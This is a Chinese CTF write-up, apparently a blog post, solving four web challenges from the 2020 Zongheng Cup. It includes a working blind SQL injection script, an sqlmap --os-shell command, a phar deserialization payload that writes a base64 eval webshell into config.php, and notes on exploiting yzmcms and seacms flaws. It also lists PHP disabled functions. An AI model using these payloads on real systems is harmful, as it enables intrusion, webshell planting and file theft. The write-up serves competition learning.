纵横杯4道webWP

·
CTFWP no tag December 27, 2020

纵横杯4道webWP

因为纵横杯Web比较简单,有幸AK一次web,分享一下比赛中的思路和踩的坑

easyci

进去发现一个登录框

图片.png

手测一波发现username输入admin返回密码错误,输入其他返回用户名或密码错误。注入点发现,上盲注脚本:

import requests

url = "http://eci-2ze0vou1lws61nzcar7j.cloudeci1.ichunqiu.com/public/index.php/home/login"
result = ""
for i in range(1,100):
    min_value = 32
    max_value = 130
    mid = (min_value+max_value)//2 #中值
    while(min_value<max_value):
        # payload ={"username" : "admin'^" + "(ascii(substr((load_file('/etc/apache2/sites-available/000-default.conf')),{0},1))>{1})".format(i,mid)+"#","password":"1"}
        # payload ={"username" : "admin'^" + "(ascii(substr((select database()),{0},1))>{1})".format(i,mid)+"#","password":"1"}
        
        payload ={"username" : "admin'^" + "(ascii(substr((password),{0},1))>{1})".format(i,mid)+"#","password":"1"}
    
        html = requests.post(url,data=payload)
        # print(payload)
        # print(html.text)
        if "用户名或密码错误" in html.text:
                #ascii值比mid值大
            min_value = mid+1   
        else:
            max_value = mid
        mid = (min_value+max_value)//2
        #找不到目标元素时停止
    # if(chr(mid)==" "):
    #     break
    result += chr(mid)
    print(result)
print("fina flag:",result)

注出密码 ,进去什么都没有。

发现可以直接load_file()读文件,尝试读取/var/www/html/public/index.php 发现网站目录不在/var/www/html

于是尝试读取配置文件/etc/apache2/sites-available/000-default.conf查看网站路径为 /var/sercet/html

Sqlmap写shell

#1.txt
POST /public/index.php/home/login HTTP/1.1
Host: eci-2ze0vou1lws61nzcar7j.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Origin: http://eci-2ze0vou1lws61nzcar7j.cloudeci1.ichunqiu.com
Connection: close
Referer: http://eci-2ze0vou1lws61nzcar7j.cloudeci1.ichunqiu.com/public/index.php
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1607866763; UM_distinctid=1765c53c45a3a3-05c146a3033e3-4c3f2779-144000-1765c53c45b69; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; __jsluid_h=5b64a1b61e1f35811a7c2ce3ad8e01ad; ci_session=1tgpuhbeu363l4sr0klk53o0qtiajdce
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 127.0.0.1

username=admin*&password=1
py -3 .\sqlmap.py -r .\1.txt  -v 3 --os-shell
os-shell> cat /etc/yooooflagggggggggggggggggggg

图片.png

图片.png

ezcms

进去发现是yzmcms,GitHub搜源码和爆出的漏洞

https://github.com/yzmcms/yzmcms/issues/53

image.png

发现有源码泄露和后台登录地址

image.png

源码中全局搜索得到用户名密码

自己vps上写

#1.html
<test123><a href="httpxx://../../../../../../../../../../../flag">123</a></test123>

image.png

image-20201226221647147.png

然后先采集网址,再测试采集获得flag

image-20201226221722823.png

详细的漏洞分析:https://www.cnblogs.com/Spec/p/11188198.html

hello php

先进行信息收集:

image.png

发现源码泄露和后台登录地址

源码中有账号密码。

简单审计一下发现

#class.php
<?php
include('config.php');
class Config{
    public $title;
    public $comment;
    public $logo_url;
    public function __construct(){
        global $title;
        global $comment;
        global $logo_url;
        $this->title= $title;
        $this->comment = $comment;
        $this->logo_url = $logo_url;
    }
    public function upload_logo(){
        if(!empty($_FILES)){
            $path='./static/'.md5(time()).'.jpg';
            move_uploaded_file($_FILES["file"]["tmp_name"],'./static/'.md5(time()).'.jpg');
        }
    }
    public function update_title($title,$comment){
        #垃圾老板就给我这么点钱,叫我怎么帮你做事。
    }
    
    public function __destruct(){
        $file = file_get_contents(pathinfo($_SERVER['SCRIPT_FILENAME'])['dirname'].'/config.php');
        $file = preg_replace('/\$title=\'.*?\';/', "\$title='$this->title';", $file);
        $file = preg_replace('/\$comment=\'.*?\';/', "\$commnet='$this->comment';", $file);
        file_put_contents(pathinfo($_SERVER['SCRIPT_FILENAME'])['dirname'].'/config.php', $file);
    }
    
}
$config=new Config;
?>

class.php中的有一个文件上传。并且路径可控。

在析构函数__destruct()中会把config.php的 $titile="XXX信息管理系统" 换为 Config类中的$titile。

#index.php
<?php include_once('header.php');?>

<?php 
if(isset($_GET['img'])&&file_exists($_GET['img'])){?>
            <img src="<?php echo $_GET['img'];?>" class="d-inline-block align-top" alt="" loading="lazy">
<?php } else {?>
    <img src="<?php echo $config->logo_url;?>" class="d-inline-block align-top" alt="" loading="lazy">
<?php }?>
    <p><?php echo $config->comment;?></p>



<?php echo $footer;?>

在index.php中 有个file_exists()函数,这个函数可以触发phar://反序列化漏洞

目前可以触发反序列化的函数:

<?php
$title = "1".var_dump(1)."1";

这样是可以执行var_dump()函数的。

<?php
    class Config
    {
        public $title = "1'.phpinfo().'1";
        public $comment;
        public $logo_url;
    }

    @unlink("phar.phar");
    $phar = new Phar("phar1.phar"); //后缀名必须为phar
    $phar->startBuffering();
    $phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub
    $o = new Config;
    $phar->setMetadata($o); //将自定义的meta-data存入manifest
    $phar->addFromString("test.txt", "test"); //添加要压缩的文件
    //签名自动计算
    $phar->stopBuffering();

生成phar.phar文件,上传。

可以搞一个在线工具,在上传的同时记录时间戳,然后md5就是路径d

图片.png

主页file_exists()触发反序列化

image.png

发现ban了许多函数,

pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,system,exec,shell_exec,popen,proc_open,passthru,symlink,link,syslog,imap_open,ld,mail,scadnir,readfile,show_source,fpassthru,readdir

先写个马进去

<?php
    class Config
    {
        public $title = "1'.file_put_contents('./config.php',base64_decode('PD9waHAgdmFyX2R1bXAoMSk7IGV2YWwoJF9SRVFVRVNUWycxJ10pOyA/Pg==')).'1";
        public $comment;
        public $logo_url;
    }

    @unlink("phar.phar");
    $phar = new Phar("phar1.phar"); //后缀名必须为phar
    $phar->startBuffering();
    $phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub
    $o = new Config;
    $phar->setMetadata($o); //将自定义的meta-data存入manifest
    $phar->addFromString("test.txt", "test"); //添加要压缩的文件
    //签名自动计算
    $phar->stopBuffering();

简单绕一下获得flag

http://eci-2ze6qzeoof3puf1gvfuw.cloudeci1.ichunqiu.com/config.php?1=echo(file_get_contents('/flag'));

大家一起来审代码

题目直接给了源码,源码比较大,应该是最近爆出的cms漏洞,直接GitHub搜海洋cms

https://github.com/ciweiin/seacms/issues/11 查到如何利用

后台弱密码admin admin

在admin_smtp.php中写入的东西会替换data/admin/smtp.php中的变量,于是可以代码注入

image-20201226235820448.png

这样可以执行phpinfo()

于是直接写一个shell进去

图片.png

图片.png

  • Redis未授权访问
  • 华为XCTF第一场WEB
取消回复

说点什么?

© 2023 Cuckoo. Using Typecho & Moricolor.